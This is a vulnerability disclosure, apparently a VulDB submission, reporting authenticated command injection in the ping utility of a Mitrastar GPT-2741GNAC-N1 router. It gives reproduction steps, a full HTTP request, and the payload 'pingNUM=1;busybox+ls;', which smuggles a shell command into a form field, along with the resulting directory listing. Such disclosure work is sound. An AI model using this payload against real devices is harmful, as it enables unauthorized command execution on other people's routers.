Submit #331238: Mitrastar GPT-2741GNAC-N1 BR_g7.9_1.11(WVK.0)b42 Command Injectioninfo

TitleMitrastar GPT-2741GNAC-N1 BR_g7.9_1.11(WVK.0)b42 Command Injection
DescriptionPoC 1. Authenticate in login page http://192.168.15.1/cgi-bin/sophia_index.cgi 2. Click in Management > Utilities 3. We will have ping tool 4. put an IP and Number of pings 5. Intercept the request Request example Bellow POST /cgi-bin/device-management-utilities-internet.cgi HTTP/1.1 Host: 192.168.15.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 59 Origin: http://192.168.15.1 Connection: close Referer: http://192.168.15.1/cgi-bin/sophia_index.cgi Cookie: COOKIE_SESSION_KEY=4f56ca0657f404002f44aab543868f13 wanPVCFlag=0&PINGFlag=1&pingIPAddr=192.168.15.111&pingNUM=1;busybox+ls; 6. The parameter "pingNUM" is vulnerable to command injection, if we use ; after number 1 we can concat commands route use busybox to execute commands, so we gonna usa ;busybox+ls; for example Output Usage: ping [OPTIONS] HOST 2tiers.html 2tiers_save.asp Aviso.cgi DNSSEC.cgi DNSSEC_add.cgi DiagGeneral.cgi Fireware_UpgradesManaged.cgi GVT_portForwarding_rule.cgi IP_Find_LanHostMac.cgi IP_MAC_Filter.cgi IPv6_MAC_Filter.cgi Instalacion.cgi InstalacionWizard ... if necessary more evidences please contact me
Source⚠️ http://192.168.15.1/cgi-bin/sophia_index.cgi
UserDhimitri (ID 45045)
Submission2024-05-08 06:17 (12 days ago)
Moderation2024-05-15 13:07 (7 days later)
StatusDuplicate
VulDB Entry230803

Do you need the next level of professionalism?

Upgrade your account now!